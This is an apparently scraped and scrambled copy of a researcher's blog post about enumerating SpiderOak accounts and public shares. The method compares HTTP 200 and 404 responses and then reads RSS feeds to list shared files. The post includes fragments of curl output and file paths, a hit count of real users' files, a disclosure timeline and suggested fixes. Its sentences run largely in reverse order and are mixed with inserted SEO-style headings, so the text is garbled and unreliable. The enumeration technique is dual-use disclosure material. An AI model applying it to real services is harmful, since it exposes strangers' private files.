I've seen situations where two different requests generate a 404 but one has headers in a different order, or just different headers, differences like this can also be used for enumeration. Along with this, make sure that the headers which are returned match for all invalid requests. This will remove the ability to enumerate accounts and so massively increase the number of requests which are required to enumerate shares - 2268 * 58 vs 615 * 58 in this situation.
The first is to fix the actual vulnerability, requesting a share which doesn't exist from an account which does should return a 404 in the same way requesting a share from one which doesn't exist. I believe there are a few things which need doing to fix this problem. Just because the names match companies doesn't mean they belong to them but could be useful information if a company you are testing happens to have a successful match. I also did some quick searches for some large company names and got hits as the account being valid but didn't get any shares. There was also a Michael Buble Christmas 2011 album, a CISSP ebook and a video that was probably porn.
#Spideroak delete account download#
I didn't download any of the files but from the names most were images, the majority from someones Christmas party. From those 14 hits there were 97 files available. Not massive but enough to show the process works. I ran these 58 folders against each of the 615 accounts and came back with 14 hits which is approximately a 2.3% hit rate. With the help of friends on Twitter I built up a list of 58 potential names, you can get this list from Pastebin. I then started running those through with lists of common share/folder names. I started with a list of 2268 common names, I ran those through and found 615 valid accounts which I thought was a good start. Well, unfortunately not that much although I didn't search that hard. share/digi_public/does_exist/Users/robin/Desktop/does_exist/another_file.zipĪnd that is it, you can read through the RSS file and generate a list of files ready to download. share/digi_public/does_exist/Users/robin/Desktop/does_exist/a_text_file.txt If you look at the RSS feed that you get from a valid share it contains a list of all the files in the share:ĭoes_exist: SpiderOak Share Feed by digi_public
Set-Cookie: uid=AAAAKlFcrba1fSDQBCd8Ag= expires=Thu, 03-Apr-14 22:31:18 GMT path=/
Set-Cookie: uid=AAAAKlFcrZ21fSDQBCdjAg= expires=Thu, 03-Apr-14 22:30:53 GMT path=/ $ curl -I The next step is to enumerate shares, to do this request the share you want to check and search the page that is returned for an RSS link in its header.Īll shares, whether they exist or not, have an RSS link in the header but if you then check the RSS link you get a 200 for valid shares but 404 for shares which don't exist.Ĭontent-Type: application/atom+xml charset=utf-8 So you can now run through a list of user names and score a hit for any 200's you get back. Set-Cookie: uid=AAAAKlFcqia9ciDRBEaQAg= expires=Thu, 03-Apr-14 22:16:06 GMT path=/ Set-Cookie: uid=AAAAKlFcqe69ciDRBEYWAg= expires=Thu, 03-Apr-14 22:15:10 GMT path=/īut on an account which doesn't exist you get a 404: Strict-Transport-Security: max-age=8640000 includeSubDomains If you request a share on an account that exists, even if the share doesn't exist, you get a 200 returned: The way the enumeration works is by checking HTTP return values to identify valid accounts then looking for RSS feeds to find valid shares. In the end I gave my talk on Breaking in to Security instead and ended up forgetting about SpiderOak.Ī week or so ago Rapid 7 published their research on Amazon Buckets and with the interest it generated I thought I'd dig out the SpiderOak work and see if it still worked, it does, so here it is. On the 13th April I was told that a fix should be in place before BSides and that they would be happy to see the talk. They acknowledged the mail and said they would work on a fix.Īt the start of April 2012 I was considering giving a talk on the research at BSides London so asked SpiderOak when a fix was likely to be in place as I would like to present but wouldn't want to reveal anything if a fix was in progress.
#Spideroak delete account code#
To cut a long story short, it could, and at the start of March 2012 I contact the security team at SpiderOak giving them the information I'd found and some sample code to show how it worked. At the start of 2012 I started using SpiderOak which also offers a way to share data with other people so decided to have a look at how that worked to see if it could also be enumerated.
About two years ago I did some research on enumerating the content of public shares on both Amazon Buckets and Mobile Me.
0 kommentar(er)
